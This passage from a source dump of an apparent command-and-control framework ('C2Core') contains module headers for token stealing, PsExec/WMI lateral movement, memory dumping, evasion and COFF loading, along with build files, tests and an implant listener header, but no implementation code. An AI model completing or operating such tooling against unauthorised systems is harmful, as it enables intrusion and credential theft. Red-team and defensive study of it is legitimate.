Rev2selfConstructor(); 30 | 31 | #else 32 | 33 | extern "C" __attribute__((visibility("default"))) Rev2self * Rev2selfConstructor(); 34 | 35 | #endif -------------------------------------------------------------------------------- /modules/MkDir/MkDir.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | class MkDir : public ModuleCmd 6 | { 7 | public: 8 | MkDir(); 9 | ~MkDir(); 10 | 11 | std::string getInfo(); 12 | 13 | int init(std::vector& splitedCmd, C2Message& c2Message); 14 | int process(C2Message& c2Message, C2Message& c2RetMessage); 15 | int errorCodeToMsg(const C2Message &c2RetMessage, std::string& errorMsg); 16 | int osCompatibility() 17 | { 18 | return OS_LINUX | OS_WINDOWS; 19 | } 20 | 21 | private: 22 | }; 23 | 24 | #ifdef _WIN32 25 | extern "C" __declspec(dllexport) MkDir * MkDirConstructor(); 26 | #else 27 | extern "C" __attribute__((visibility("default"))) MkDir * MkDirConstructor(); 28 | #endif 29 | 30 | -------------------------------------------------------------------------------- /modules/Whoami/tests/testsWhoami.cpp: -------------------------------------------------------------------------------- 1 | #include "../Whoami.hpp" 2 | 3 | bool testWhoami(); 4 | 5 | int main() 6 | { 7 | bool res; 8 | std::cout << "[+] testWhoami" << std::endl; 9 | res = testWhoami(); 10 | if (res) 11 | std::cout << "[+] Sucess" << std::endl; 12 | else 13 | std::cout << "[-] Failed" << std::endl; 14 | return !res; 15 | } 16 | 17 | bool testWhoami() 18 | { 19 | std::unique_ptr mod = std::make_unique(); 20 | std::vector cmd = {"whoami"}; 21 | C2Message msg, ret; 22 | mod->init(cmd, msg); 23 | mod->process(msg, ret); 24 | 25 | std::cout << "[+] whoami output: " << ret.returnvalue() << std::endl; 26 | 27 | return !ret.returnvalue().empty(); 28 | } 29 | -------------------------------------------------------------------------------- /.github/workflows/Tests_Linux.yml: -------------------------------------------------------------------------------- 1 | name: C2Core Tests (Linux) 2 | 3 | on: 4 | # push: 5 | # branches: 6 | # - master 7 | workflow_dispatch: 8 | 9 | jobs: 10 | test-linux: 11 | runs-on: ubuntu-latest 12 | 13 | steps: 14 | - name: Checkout repository 15 | uses: actions/checkout@v4 16 | 17 | - name: Install dependencies 18 | run: sudo apt-get update && sudo apt-get install -y cmake g++ curl make libssl-dev libsmbclient-dev pkg-config 19 | 20 | - name: Configure with CMake 21 | run: cmake -S . -B build -DC2CORE_BUILD_TESTS=ON 22 | 23 | - name: Build 24 | run: cmake --build build -j$(nproc) 25 | 26 | - name: Run tests 27 | run: ctest --test-dir build --output-on-failure 28 | -------------------------------------------------------------------------------- /modules/GetEnv/tests/testsGetEnv.cpp: -------------------------------------------------------------------------------- 1 | #include "../GetEnv.hpp" 2 | 3 | bool testGetEnv(); 4 | 5 | int main() 6 | { 7 | bool res; 8 | std::cout << "[+] testGetEnv" << std::endl; 9 | res = testGetEnv(); 10 | if (res) 11 | std::cout << "[+] Sucess" << std::endl; 12 | else 13 | std::cout << "[-] Failed" << std::endl; 14 | 15 | return !res; 16 | } 17 | 18 | bool testGetEnv() 19 | { 20 | std::unique_ptr mod = std::make_unique(); 21 | std::vector cmd = {"getEnv"}; 22 | C2Message msg, ret; 23 | mod->init(cmd, msg); 24 | mod->process(msg, ret); 25 | 26 | std::cout << "[+] getEnv output: " << ret.returnvalue() << std::endl; 27 | 28 | return !ret.returnvalue().empty(); 29 | } 30 | -------------------------------------------------------------------------------- /modules/Netstat/tests/testsNetstat.cpp: -------------------------------------------------------------------------------- 1 | #include "../Netstat.hpp" 2 | 3 | bool testNetstat(); 4 | 5 | int main() 6 | { 7 | bool res; 8 | std::cout << "[+] testNetstat" << std::endl; 9 | res = testNetstat(); 10 | if (res) 11 | std::cout << "[+] Sucess" << std::endl; 12 | else 13 | std::cout << "[-] Failed" << std::endl; 14 | return !res; 15 | } 16 | 17 | bool testNetstat() 18 | { 19 | std::unique_ptr mod = std::make_unique(); 20 | std::vector cmd = {"netstat"}; 21 | C2Message msg, ret; 22 | mod->init(cmd, msg); 23 | mod->process(msg, ret); 24 | 25 | std::cout << "[+] netstat output: " << ret.returnvalue() << std::endl; 26 | 27 | return !ret.returnvalue().empty(); 28 | } 29 | -------------------------------------------------------------------------------- /modules/Cat/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(Cat SHARED Cat.cpp) 3 | set_property(TARGET Cat PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(Cat ) 5 | add_custom_command(TARGET Cat POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsCat tests/testsCat.cpp Cat.cpp) 10 | target_link_libraries(testsCat ) 11 | add_custom_command(TARGET testsCat POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | 14 | add_test(NAME testsCat COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 15 | endif() -------------------------------------------------------------------------------- /modules/Run/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(Run SHARED Run.cpp) 3 | set_property(TARGET Run PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(Run ) 5 | add_custom_command(TARGET Run POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsRun tests/testsRun.cpp Run.cpp) 10 | target_link_libraries(testsRun ) 11 | add_custom_command(TARGET testsRun POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | 14 | add_test(NAME testsRun COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 15 | endif() -------------------------------------------------------------------------------- /modules/IpConfig/tests/testsIpConfig.cpp: -------------------------------------------------------------------------------- 1 | #include "../IpConfig.hpp" 2 | 3 | bool testIpConfig(); 4 | 5 | int main() 6 | { 7 | bool res; 8 | std::cout << "[+] testIpConfig" << std::endl; 9 | res = testIpConfig(); 10 | if (res) 11 | std::cout << "[+] Sucess" << std::endl; 12 | else 13 | std::cout << "[-] Failed" << std::endl; 14 | return !res; 15 | } 16 | 17 | bool testIpConfig() 18 | { 19 | std::unique_ptr mod = std::make_unique(); 20 | std::vector cmd = {"ipConfig"}; 21 | C2Message msg, ret; 22 | mod->init(cmd, msg); 23 | mod->process(msg, ret); 24 | 25 | std::cout << "[+] ipConfig output: " << ret.returnvalue() << std::endl; 26 | 27 | return !ret.returnvalue().empty(); 28 | } 29 | -------------------------------------------------------------------------------- /modules/Tree/Tree.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | 6 | class Tree : public ModuleCmd 7 | { 8 | 9 | public: 10 | Tree(); 11 | ~Tree(); 12 | 13 | std::string getInfo(); 14 | 15 | int init(std::vector& splitedCmd, C2Message& c2Message); 16 | int process(C2Message& c2Message, C2Message& c2RetMessage); 17 | int osCompatibility() 18 | { 19 | return OS_LINUX | OS_WINDOWS; 20 | } 21 | 22 | private: 23 | std::string iterProcess(const std::string& path, int depth); 24 | 25 | }; 26 | 27 | 28 | #ifdef _WIN32 29 | 30 | extern "C" __declspec(dllexport) Tree * TreeConstructor(); 31 | 32 | #else 33 | 34 | extern "C" __attribute__((visibility("default"))) Tree * TreeConstructor(); 35 | 36 | #endif 37 | -------------------------------------------------------------------------------- /modules/StealToken/StealToken.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | 6 | class StealToken : public ModuleCmd 7 | { 8 | 9 | public: 10 | StealToken(); 11 | ~StealToken(); 12 | 13 | std::string getInfo(); 14 | 15 | int init(std::vector& splitedCmd, C2Message& c2Message); 16 | int process(C2Message& c2Message, C2Message& c2RetMessage); 17 | int osCompatibility() 18 | { 19 | return OS_WINDOWS; 20 | } 21 | 22 | private: 23 | std::string stealToken(int pid); 24 | }; 25 | 26 | 27 | #ifdef _WIN32 28 | 29 | extern "C" __declspec(dllexport) StealToken * StealTokenConstructor(); 30 | 31 | #else 32 | 33 | extern "C" __attribute__((visibility("default"))) StealToken * StealTokenConstructor(); 34 | 35 | #endif -------------------------------------------------------------------------------- /modules/Cat/Cat.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | 6 | class Cat : public ModuleCmd 7 | { 8 | 9 | public: 10 | Cat(); 11 | ~Cat(); 12 | 13 | std::string getInfo(); 14 | 15 | int init(std::vector& splitedCmd, C2Message& c2Message); 16 | int process(C2Message& c2Message, C2Message& c2RetMessage); 17 | int errorCodeToMsg(const C2Message &c2RetMessage, std::string& errorMsg); 18 | int osCompatibility() 19 | { 20 | return OS_LINUX | OS_WINDOWS; 21 | } 22 | 23 | 24 | private: 25 | 26 | }; 27 | 28 | 29 | #ifdef _WIN32 30 | 31 | extern "C" __declspec(dllexport) Cat * CatConstructor(); 32 | 33 | #else 34 | 35 | extern "C" __attribute__((visibility("default"))) Cat * CatConstructor(); 36 | 37 | #endif 38 | -------------------------------------------------------------------------------- /modules/Tree/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(Tree SHARED Tree.cpp) 3 | set_property(TARGET Tree PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(Tree ) 5 | add_custom_command(TARGET Tree POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsTree tests/testsTree.cpp Tree.cpp) 10 | target_link_libraries(testsTree ) 11 | add_custom_command(TARGET testsTree POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | 14 | add_test(NAME testsTree COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 15 | endif() -------------------------------------------------------------------------------- /.github/workflows/Tests_Windows.yml: -------------------------------------------------------------------------------- 1 | name: C2Core Tests (Windows) 2 | 3 | on: 4 | # push: 5 | # branches: 6 | # - master 7 | workflow_dispatch: 8 | 9 | jobs: 10 | test-windows: 11 | runs-on: windows-latest 12 | 13 | steps: 14 | - name: Checkout repository 15 | uses: actions/checkout@v4 16 | 17 | - name: Add msbuild to PATH 18 | uses: microsoft/setup-msbuild@v1.1.3 19 | with: 20 | msbuild-architecture: x64 21 | 22 | - name: Configure CMake for tests 23 | run: cmake -G "Visual Studio 17 2022" -S . -B build -DC2CORE_BUILD_TESTS=ON 24 | 25 | - name: Build 26 | run: cmake --build build --config Release --parallel 27 | 28 | - name: Run tests 29 | run: ctest --test-dir build -C Release 30 | -------------------------------------------------------------------------------- /modules/PsExec/PsExec.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | 6 | class PsExec : public ModuleCmd 7 | { 8 | 9 | public: 10 | PsExec(); 11 | ~PsExec(); 12 | 13 | std::string getInfo(); 14 | 15 | int init(std::vector& splitedCmd, C2Message& c2Message); 16 | int process(C2Message& c2Message, C2Message& c2RetMessage); 17 | int errorCodeToMsg(const C2Message& c2RetMessage, std::string& errorMsg); 18 | int osCompatibility() 19 | { 20 | return OS_WINDOWS; 21 | } 22 | 23 | private: 24 | 25 | }; 26 | 27 | 28 | #ifdef _WIN32 29 | 30 | extern "C" __declspec(dllexport) PsExec * PsExecConstructor(); 31 | 32 | #else 33 | 34 | extern "C" __attribute__((visibility("default"))) PsExec * PsExecConstructor(); 35 | 36 | #endif 37 | 38 | -------------------------------------------------------------------------------- /modules/EnumerateShares/EnumerateShares.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | class EnumerateShares : public ModuleCmd 6 | { 7 | public: 8 | EnumerateShares(); 9 | ~EnumerateShares(); 10 | 11 | std::string getInfo(); 12 | 13 | int init(std::vector& splitedCmd, C2Message& c2Message); 14 | int process(C2Message& c2Message, C2Message& c2RetMessage); 15 | int osCompatibility() 16 | { 17 | return OS_LINUX | OS_WINDOWS; 18 | } 19 | 20 | private: 21 | std::string runEnum(const std::string& host); 22 | }; 23 | 24 | #ifdef _WIN32 25 | extern "C" __declspec(dllexport) EnumerateShares* EnumerateSharesConstructor(); 26 | #else 27 | extern "C" __attribute__((visibility("default"))) EnumerateShares* EnumerateSharesConstructor(); 28 | #endif 29 | -------------------------------------------------------------------------------- /modules/MkDir/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(MkDir SHARED MkDir.cpp) 3 | set_property(TARGET MkDir PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(MkDir ) 5 | add_custom_command(TARGET MkDir POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsMkDir tests/testsMkDir.cpp MkDir.cpp) 10 | target_link_libraries(testsMkDir ) 11 | add_custom_command(TARGET testsMkDir POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | add_test(NAME testsMkDir COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 14 | endif() 15 | -------------------------------------------------------------------------------- /modules/Shell/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(Shell SHARED Shell.cpp) 3 | set_property(TARGET Shell PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(Shell) 5 | add_custom_command(TARGET Shell POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsShell tests/testsShell.cpp Shell.cpp) 10 | target_link_libraries(testsShell) 11 | add_custom_command(TARGET testsShell POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | add_test(NAME testsShell COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 14 | endif() 15 | -------------------------------------------------------------------------------- /modules/Upload/Upload.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | 6 | class Upload : public ModuleCmd 7 | { 8 | 9 | public: 10 | Upload(); 11 | ~Upload(); 12 | 13 | std::string getInfo(); 14 | 15 | int init(std::vector& splitedCmd, C2Message& c2Message); 16 | int process(C2Message& c2Message, C2Message& c2RetMessage); 17 | int errorCodeToMsg(const C2Message &c2RetMessage, std::string& errorMsg); 18 | int osCompatibility() 19 | { 20 | return OS_LINUX | OS_WINDOWS; 21 | } 22 | 23 | private: 24 | 25 | }; 26 | 27 | 28 | #ifdef _WIN32 29 | 30 | extern "C" __declspec(dllexport) Upload * UploadConstructor(); 31 | 32 | #else 33 | 34 | extern "C" __attribute__((visibility("default"))) Upload * UploadConstructor(); 35 | 36 | #endif 37 | 38 | -------------------------------------------------------------------------------- /modules/ListProcesses/ListProcesses.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | 6 | class ListProcesses : public ModuleCmd 7 | { 8 | 9 | public: 10 | ListProcesses(); 11 | ~ListProcesses(); 12 | 13 | std::string getInfo(); 14 | 15 | int init(std::vector& splitedCmd, C2Message& c2Message); 16 | int process(C2Message& c2Message, C2Message& c2RetMessage); 17 | int osCompatibility() 18 | { 19 | return OS_LINUX | OS_WINDOWS; 20 | } 21 | 22 | private: 23 | std::string listProcesses(); 24 | 25 | }; 26 | 27 | 28 | #ifdef _WIN32 29 | 30 | extern "C" __declspec(dllexport) ListProcesses * ListProcessesConstructor(); 31 | 32 | #else 33 | 34 | extern "C" __attribute__((visibility("default"))) ListProcesses * ListProcessesConstructor(); 35 | 36 | #endif -------------------------------------------------------------------------------- /modules/Script/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(Script SHARED Script.cpp) 3 | set_property(TARGET Script PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(Script ) 5 | add_custom_command(TARGET Script POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsScript tests/testsScript.cpp Script.cpp) 10 | target_link_libraries(testsScript ) 11 | add_custom_command(TARGET testsScript POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | 14 | add_test(NAME testsScript COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 15 | endif() -------------------------------------------------------------------------------- /modules/Upload/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(Upload SHARED Upload.cpp) 3 | set_property(TARGET Upload PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(Upload ) 5 | add_custom_command(TARGET Upload POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsUpload tests/testsUpload.cpp Upload.cpp) 10 | target_link_libraries(testsUpload ) 11 | add_custom_command(TARGET testsUpload POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | 14 | add_test(NAME testsUpload COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 15 | endif() -------------------------------------------------------------------------------- /modules/GetEnv/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(GetEnv SHARED GetEnv.cpp) 3 | set_property(TARGET GetEnv PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(GetEnv ) 5 | add_custom_command(TARGET GetEnv POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsGetEnv tests/testsGetEnv.cpp GetEnv.cpp) 10 | target_link_libraries(testsGetEnv ) 11 | add_custom_command(TARGET testsGetEnv POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | add_test(NAME testsGetEnv COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 14 | endif() 15 | -------------------------------------------------------------------------------- /modules/Whoami/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(Whoami SHARED Whoami.cpp) 3 | set_property(TARGET Whoami PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(Whoami ) 5 | add_custom_command(TARGET Whoami POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsWhoami tests/testsWhoami.cpp Whoami.cpp) 10 | target_link_libraries(testsWhoami ) 11 | add_custom_command(TARGET testsWhoami POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | add_test(NAME testsWhoami COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 14 | endif() 15 | -------------------------------------------------------------------------------- /modules/Chisel/Chisel.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | 6 | class Chisel : public ModuleCmd 7 | { 8 | 9 | public: 10 | Chisel(); 11 | ~Chisel(); 12 | 13 | std::string getInfo(); 14 | 15 | int init(std::vector& splitedCmd, C2Message& c2Message); 16 | int process(C2Message& c2Message, C2Message& c2RetMessage); 17 | int followUp(const C2Message &c2RetMessage); 18 | int osCompatibility() 19 | { 20 | return OS_WINDOWS; 21 | } 22 | 23 | private: 24 | std::vector> m_instances; 25 | 26 | }; 27 | 28 | 29 | #ifdef _WIN32 30 | 31 | extern "C" __declspec(dllexport) Chisel * A_ChiselConstructor(); 32 | 33 | #else 34 | 35 | extern "C" __attribute__((visibility("default"))) Chisel * ChiselConstructor(); 36 | 37 | #endif 38 | 39 | -------------------------------------------------------------------------------- /modules/MiniDump/MiniDump.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | #include "Common.hpp" 5 | 6 | 7 | class MiniDump : public ModuleCmd 8 | { 9 | public: 10 | MiniDump(); 11 | ~MiniDump(); 12 | 13 | std::string getInfo(); 14 | 15 | int init(std::vector& splitedCmd, C2Message& c2Message); 16 | int process(C2Message& c2Message, C2Message& c2RetMessage); 17 | int errorCodeToMsg(const C2Message &c2RetMessage, std::string& errorMsg); 18 | int osCompatibility() 19 | { 20 | return OS_WINDOWS; 21 | } 22 | 23 | private: 24 | 25 | }; 26 | 27 | 28 | #ifdef _WIN32 29 | 30 | extern "C" __declspec(dllexport) MiniDump * MiniDumpConstructor(); 31 | 32 | #else 33 | 34 | extern "C" __attribute__((visibility("default"))) MiniDump * MiniDumpConstructor(); 35 | 36 | #endif 37 | -------------------------------------------------------------------------------- /modules/Remove/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(Remove SHARED Remove.cpp) 3 | set_property(TARGET Remove PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(Remove ) 5 | add_custom_command(TARGET Remove POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$" 7 | ) 8 | 9 | if(C2CORE_BUILD_TESTS) 10 | add_executable(testsRemove tests/testsRemove.cpp Remove.cpp) 11 | target_link_libraries(testsRemove ) 12 | add_custom_command(TARGET testsRemove POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 13 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 14 | 15 | add_test(NAME testsRemove COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 16 | endif() 17 | -------------------------------------------------------------------------------- /modules/WmiExec/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(WmiExec SHARED WmiExec.cpp) 3 | set_property(TARGET WmiExec PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(WmiExec ) 5 | add_custom_command(TARGET WmiExec POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsWmiExec tests/testsWmiExec.cpp WmiExec.cpp) 10 | target_link_libraries(testsWmiExec ) 11 | add_custom_command(TARGET testsWmiExec POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | 14 | add_test(NAME testsWmiExec COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 15 | endif() -------------------------------------------------------------------------------- /listener/ListenerHttp.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Listener.hpp" 4 | 5 | #define CPPHTTPLIB_OPENSSL_SUPPORT 6 | #include "httplib.h" 7 | 8 | 9 | class ListenerHttp : public Listener 10 | { 11 | 12 | public: 13 | ListenerHttp(const std::string& ip, int localport, const nlohmann::json& config, bool isHttps=false); 14 | ~ListenerHttp(); 15 | 16 | int init(); 17 | 18 | private: 19 | void launchHttpServ(); 20 | 21 | int HandleCheckIn(const httplib::Request& req, httplib::Response& res); 22 | int HandleCheckIn(const std::string& requestData, httplib::Response& res); 23 | 24 | std::string m_host; 25 | int m_port; 26 | bool m_isHttps; 27 | nlohmann::json m_listenerConfig; 28 | 29 | std::unique_ptr m_svr; 30 | std::unique_ptr m_httpServ; 31 | }; 32 | -------------------------------------------------------------------------------- /modules/Evasion/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(Evasion SHARED Evasion.cpp) 3 | set_property(TARGET Evasion PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(Evasion ) 5 | add_custom_command(TARGET Evasion POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsEvasion tests/testsEvasion.cpp Evasion.cpp) 10 | target_link_libraries(testsEvasion ) 11 | add_custom_command(TARGET testsEvasion POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | 14 | add_test(NAME testsEvasion COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 15 | endif() 16 | -------------------------------------------------------------------------------- /modules/ListDirectory/ListDirectory.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | 6 | class ListDirectory : public ModuleCmd 7 | { 8 | 9 | public: 10 | ListDirectory(); 11 | ~ListDirectory(); 12 | 13 | std::string getInfo(); 14 | 15 | int init(std::vector& splitedCmd, C2Message& c2Message); 16 | int process(C2Message& c2Message, C2Message& c2RetMessage); 17 | int osCompatibility() 18 | { 19 | return OS_LINUX | OS_WINDOWS; 20 | } 21 | 22 | private: 23 | std::string listDirectory(const std::string& path); 24 | 25 | }; 26 | 27 | 28 | #ifdef _WIN32 29 | 30 | extern "C" __declspec(dllexport) ListDirectory * ListDirectoryConstructor(); 31 | 32 | #else 33 | 34 | extern "C" __attribute__((visibility("default"))) ListDirectory * ListDirectoryConstructor(); 35 | 36 | #endif 37 | -------------------------------------------------------------------------------- /modules/Netstat/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(Netstat SHARED Netstat.cpp) 3 | set_property(TARGET Netstat PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(Netstat ) 5 | add_custom_command(TARGET Netstat POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsNetstat tests/testsNetstat.cpp Netstat.cpp) 10 | target_link_libraries(testsNetstat ) 11 | add_custom_command(TARGET testsNetstat POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | add_test(NAME testsNetstat COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 14 | endif() 15 | -------------------------------------------------------------------------------- /modules/Registry/tests/testsRegistry.cpp: -------------------------------------------------------------------------------- 1 | #include "../Registry.hpp" 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | int main() 8 | { 9 | { 10 | std::unique_ptr module = std::make_unique(); 11 | std::vector cmd = {"registry", "set", "-h", "HKLM", "-k", "Software\\Acme", "-n", "Path", "-d", "C:/Temp"}; 12 | 13 | C2Message message; 14 | C2Message ret; 15 | 16 | if (module->init(cmd, message) != 0) 17 | { 18 | return 1; 19 | } 20 | 21 | module->process(message, ret); 22 | 23 | std::string err; 24 | module->errorCodeToMsg(ret, err); 25 | 26 | std::cout << ret.returnvalue() << std::endl; 27 | std::cerr << err << std::endl; 28 | } 29 | 30 | 31 | return 0; 32 | } 33 | -------------------------------------------------------------------------------- /modules/CoffLoader/CoffLoader.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | 6 | class CoffLoader : public ModuleCmd 7 | { 8 | 9 | public: 10 | CoffLoader(); 11 | ~CoffLoader(); 12 | 13 | std::string getInfo(); 14 | 15 | int init(std::vector& splitedCmd, C2Message& c2Message); 16 | int process(C2Message& c2Message, C2Message& c2RetMessage); 17 | int osCompatibility() 18 | { 19 | return OS_WINDOWS; 20 | } 21 | 22 | private: 23 | std::string coffLoader(std::string& payload, std::string& functionName, std::string& argsCompressed); 24 | 25 | }; 26 | 27 | 28 | #ifdef _WIN32 29 | 30 | extern "C" __declspec(dllexport) CoffLoader * A_CoffLoaderConstructor(); 31 | 32 | #else 33 | 34 | extern "C" __attribute__((visibility("default"))) CoffLoader * CoffConstructor(); 35 | 36 | #endif 37 | -------------------------------------------------------------------------------- /modules/Download/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(Download SHARED Download.cpp) 3 | set_property(TARGET Download PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(Download ) 5 | add_custom_command(TARGET Download POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsDownload tests/testsDownload.cpp Download.cpp) 10 | target_link_libraries(testsDownload ) 11 | add_custom_command(TARGET testsDownload POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | 14 | add_test(NAME testsDownload COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 15 | endif() -------------------------------------------------------------------------------- /modules/EnumerateShares/tests/testsEnumerateShares.cpp: 